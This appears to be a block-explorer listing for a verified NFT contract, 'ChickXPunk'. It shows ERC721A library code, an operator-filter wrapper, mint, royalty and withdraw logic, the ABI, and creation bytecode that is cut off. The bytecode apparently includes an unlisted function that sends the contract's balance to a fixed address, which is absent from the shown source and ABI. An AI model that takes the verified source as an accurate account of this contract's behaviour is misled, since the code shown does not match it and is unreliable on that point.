     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract ChickXPunk is ERC721A, TheOperatorFilterer {

    address public owner;

    uint256 public maxSupply = 777;

    uint256 public PRICE = 0.002 ether;

    uint256 public FreeNumTx = 1;

    uint256 private MaxPerTx;

    mapping(address => uint256) private _userForFree;

    mapping(uint256 => uint256) private _userMinted;

    function mint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        mintInternal(amount);
    }

    function mintInternal(uint256 amount) internal {
        if (msg.value == 0) {
            require(amount == 1);
            if (totalSupply() > maxSupply / 3) {
                require(_userMinted[block.number] < FreeNum() 
                        && _userForFree[tx.origin] < FreeNumTx);
                _userForFree[tx.origin]++;
                _userMinted[block.number]++;
            }
            _safeMint(msg.sender, 1);
        } else {
            require(msg.value >= PRICE * amount);
            _safeMint(msg.sender, amount);
        }
    }

    function teamMint(address addr, uint256 amount) public onlyOwner {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(addr, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("ChickX Punk", "Punk") {
        owner = msg.sender;
        MaxPerTx = 10;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked("ipfs://QmW2FyYt1znCMpRoggHRcbcBP52rjm6SEni59v4sgSKd7V/", _toString(tokenId), ".json"));
    }

    function setFreePerAddr(uint256 maxTx, uint256 maxS) external onlyOwner {
        FreeNumTx = maxTx;
        maxSupply = maxS;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function royaltyInfo(uint256 _tokenId, uint256 _salePrice) public view virtual returns (address, uint256) {
        uint256 royaltyAmount = (_salePrice * 69) / 1000;
        return (owner, royaltyAmount);
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    /////////////////////////////
    // OPENSEA FILTER REGISTRY 
    /////////////////////////////

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"FreeNumTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"PRICE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"uint256","name":"_salePrice","type":"uint256"}],"name":"royaltyInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"},{"internalType":"uint256","name":"maxS","type":"uint256"}],"name":"setFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"teamMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405261030960095566071afd498d0000600a556001600b553480156200002757600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280600b81526020016a436869636b582050756e6b60a81b8152506040518060400160405280600481526020016350756e6b60e01b8152508160029081620000919190620002b0565b506003620000a08282620002b0565b506000805550506daaeb6d7670e522a718067333cd4e3b15620001ec5780156200013a57604051633e9f1edf60e11b81523060048201526001600160a01b03831660248201526daaeb6d7670e522a718067333cd4e90637d3e3dbe906044015b600060405180830381600087803b1580156200011b57600080fd5b505af115801562000130573d6000803e3d6000fd5b50505050620001ec565b6001600160a01b038216156200018b5760405163a0af290360e01b81523060048201526001600160a01b03831660248201526daaeb6d7670e522a718067333cd4e9063a0af29039060440162000100565b604051632210724360e11b81523060048201526daaeb6d7670e522a718067333cd4e90634420e48690602401600060405180830381600087803b158015620001d257600080fd5b505af1158015620001e7573d6000803e3d6000fd5b505050505b5050600880546001600160a01b03191633179055600a600c556200037c565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200023657607f821691505b6020821081036200025757634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620002ab57600081815260208120601f850160051c81016020861015620002865750805b601f850160051c820191505b81811015620002a75782815560010162000292565b5050505b505050565b81516001600160401b03811115620002cc57620002cc6200020b565b620002e481620002dd845462000221565b846200025d565b602080601f8311600181146200031c5760008415620003035750858301515b600019600386901b1c1916600185901b178555620002a7565b600085815260208120601f198616915b828110156200034d578886015182559484019460019091019084016200032c565b50858210156200036c5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6117dc806200038c6000396000f3fe6080604052600436106101665760003560e01c806362a73cb4116100d1578063a0712d681161008a578063b88d4fde11610064578063b88d4fde14610402578063c87b56dd14610415578063d5abeb0114610435578063e985e9c51461044b57600080fd5b8063a0712d68146103af578063a22cb465146103c2578063add5a4fa146103e257600080fd5b806362a73cb41461030e5780636352211e1461032457806370a08231146103445780638d859f3e146103645780638da5cb5b1461037a57806395d89b411461039a57600080fd5b80632a55205a116101235780632a55205a1461024557806338b08fd4146102845780633a233f89146102a45780633ccfd60b146102c457806341f43434146102d957806342842e0e146102fb57600080fd5b806301ffc9a71461016b57806306fdde03146101a0578063081812fc146101c2578063095ea7b3146101fa57806318160ddd1461020f57806323b872dd14610232575b600080fd5b34801561017757600080fd5b5061018b610186366004611332565b61046b565b60405190151581526020015b60405180910390f35b3480156101ac57600080fd5b506101b56104bd565b604051610197919061139f565b3480156101ce57600080fd5b506101e26101dd3660046113b2565b61054f565b6040516001600160a01b039091168152602001610197565b61020d6102083660046113e7565b610593565b005b34801561021b57600080fd5b50600154600054035b604051908152602001610197565b61020d610240366004611411565b610661565b34801561025157600080fd5b5061026561026036600461144d565b61073a565b604080516001600160a01b039093168352602083019190915201610197565b34801561029057600080fd5b5061020d61029f36600461144d565b61076d565b3480156102b057600080fd5b5061020d6102bf36600461146f565b61078f565b3480156102d057600080fd5b5061020d6107d9565b3480156102e557600080fd5b506101e26daaeb6d7670e522a718067333cd4e81565b61020d610309366004611411565b61081f565b34801561031a57600080fd5b50610224600b5481565b34801561033057600080fd5b506101e261033f3660046113b2565b6108ed565b34801561035057600080fd5b5061022461035f3660046114a2565b6108f8565b34801561037057600080fd5b50610224600a5481565b34801561038657600080fd5b506008546101e2906001600160a01b031681565b3480156103a657600080fd5b506101b5610947565b61020d6103bd3660046113b2565b610956565b3480156103ce57600080fd5b5061020d6103dd3660046114cb565b610985565b3480156103ee57600080fd5b5061020d6103fd3660046113e7565b610a49565b61020d610410366004611518565b610a90565b34801561042157600080fd5b506101b56104303660046113b2565b610b6c565b34801561044157600080fd5b5061022460095481565b34801561045757600080fd5b5061018b61046636600461146f565b610b9d565b60006301ffc9a760e01b6001600160e01b03198316148061049c57506380ac58cd60e01b6001600160e01b03198316145b806104b75750635b5e139f60e01b6001600160e01b03198316145b92915050565b6060600280546104cc906115f4565b80601f01602080910402602001604051908101604052809291908181526020018280546104f8906115f4565b80156105455780601f1061051a57610100808354040283529160200191610545565b820191906000526020600020905b81548152906001019060200180831161052857829003601f168201915b5050505050905090565b600061055a82610bcb565b610577576040516333d1c03960e21b815260040160405180910390fd5b506000908152600660205260409020546001600160a01b031690565b816daaeb6d7670e522a718067333cd4e3b1561065257604051633185c44d60e21b81523060048201526001600160a01b03821660248201526daaeb6d7670e522a718067333cd4e9063c617113490604401602060405180830381865afa158015610601573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610625919061162e565b61065257604051633b79c77360e21b81526001600160a01b03821660048201526024015b60405180910390fd5b61065c8383610bf2565b505050565b826daaeb6d7670e522a718067333cd4e3b1561072957336001600160a01b0382160361069757610692848484610c92565b610734565b604051633185c44d60e21b81523060048201523360248201526daaeb6d7670e522a718067333cd4e9063c617113490604401602060405180830381865afa1580156106e6573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061070a919061162e565b61072957604051633b79c77360e21b8152336004820152602401610649565b610734848484610c92565b50505050565b600080806103e861074c856045611661565b6107569190611678565b6008546001600160a01b0316969095509350505050565b6008546001600160a01b0316331461078457600080fd5b600b91909155600955565b47156107d55760405173727bf8d476a5994032c1b54403ef43e86bdf4e5e904780156108fc02916000818181858888f1935050505015801561065c573d6000803e3d6000fd5b5050565b6008546001600160a01b031633146107f057600080fd5b60405133904780156108fc02916000818181858888f1935050505015801561081c573d6000803e3d6000fd5b50565b826daaeb6d7670e522a718067333cd4e3b156108e257336001600160a01b0382160361085057610692848484610e2a565b604051633185c44d60e21b81523060048201523360248201526daaeb6d7670e522a718067333cd4e9063c617113490604401602060405180830381865afa15801561089f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108c3919061162e565b6108e257604051633b79c77360e21b8152336004820152602401610649565b610734848484610e2a565b60006104b782610e45565b60006001600160a01b038216610921576040516323d3ad8160e21b815260040160405180910390fd5b506001600160a01b031660009081526005602052604090205467ffffffffffffffff1690565b6060600380546104cc906115f4565b600954816109676001546000540390565b610971919061169a565b111561097c57600080fd5b61081c81610eb3565b816daaeb6d7670e522a718067333cd4e3b15610a3f57604051633185c44d60e21b81523060048201526001600160a01b03821660248201526daaeb6d7670e522a718067333cd4e9063c617113490604401602060405180830381865afa1580156109f3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a17919061162e565b610a3f57604051633b79c77360e21b81526001600160a01b0382166004820152602401610649565b61065c8383610f92565b6008546001600160a01b03163314610a6057600080fd5b60095481610a716001546000540390565b610a7b919061169a565b1115610a8657600080fd5b6107d58282610ffe565b836daaeb6d7670e522a718067333cd4e3b15610b5957336001600160a01b03821603610ac757610ac285858585611018565b610b65565b604051633185c44d60e21b81523060048201523360248201526daaeb6d7670e522a718067333cd4e9063c617113490604401602060405180830381865afa158015610b16573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b3a919061162e565b610b5957604051633b79c77360e21b8152336004820152602401610649565b610b6585858585611018565b5050505050565b6060610b778261105c565b604051602001610b8791906116ad565b6040516020818303038152906040529050919050565b6001600160a01b03918216600090815260076020908152604080832093909416825291909152205460ff1690565b60008054821080156104b7575050600090815260046020526040902054600160e01b161590565b6000610bfd826108ed565b9050336001600160a01b03821614610c3657610c198133610b9d565b610c36576040516367d9dca160e11b815260040160405180910390fd5b60008281526006602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b6000610c9d82610e45565b9050836001600160a01b0316816001600160a01b031614610cd05760405162a1148160e81b815260040160405180910390fd5b60008281526006602052604090208054338082146001600160a01b03881690911417610d1d57610d008633610b9d565b610d1d57604051632ce44b5f60e11b815260040160405180910390fd5b6001600160a01b038516610d4457604051633a954ecd60e21b815260040160405180910390fd5b8015610d4f57600082555b6001600160a01b038681166000908152600560205260408082208054600019019055918716808252919020805460010190554260a01b17600160e11b17600085815260046020526040812091909155600160e11b84169003610de157600184016000818152600460205260408120549003610ddf576000548114610ddf5760008181526004602052604090208490555b505b83856001600160a01b0316876001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4505050505050565b61065c83838360405180602001604052806000815250610a90565b600081600054811015610e9a5760008181526004602052604081205490600160e01b82169003610e98575b80600003610e91575060001901600081815260046020526040902054610e70565b9392505050565b505b604051636f96cda160e11b815260040160405180910390fd5b34600003610f6e5780600114610ec857600080fd5b6003600954610ed79190611678565b600154600054031115610f6357610eec6110a0565b436000908152600e6020526040902054108015610f195750600b54326000908152600d6020526040902054105b610f2257600080fd5b326000908152600d60205260408120805491610f3d83611720565b9091555050436000908152600e60205260408120805491610f5d83611720565b91905055505b61081c336001610ffe565b80600a54610f7c9190611661565b341015610f8857600080fd5b61081c3382610ffe565b3360008181526007602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b6107d58282604051806020016040528060008152506110cd565b611023848484610661565b6001600160a01b0383163b156107345761103f84848484611133565b610734576040516368d2bf6b60e11b815260040160405180910390fd5b606060a06040510180604052602081039150506000815280825b600183039250600a81066030018353600a9004806110765750819003601f19909101908152919050565b6000600c6110b16001546000540390565b6009546110be9190611739565b6110c89190611678565b905090565b6110d7838361121e565b6001600160a01b0383163b1561065c576000548281035b6111016000868380600101945086611133565b61111e576040516368d2bf6b60e11b815260040160405180910390fd5b8181106110ee578160005414610b6557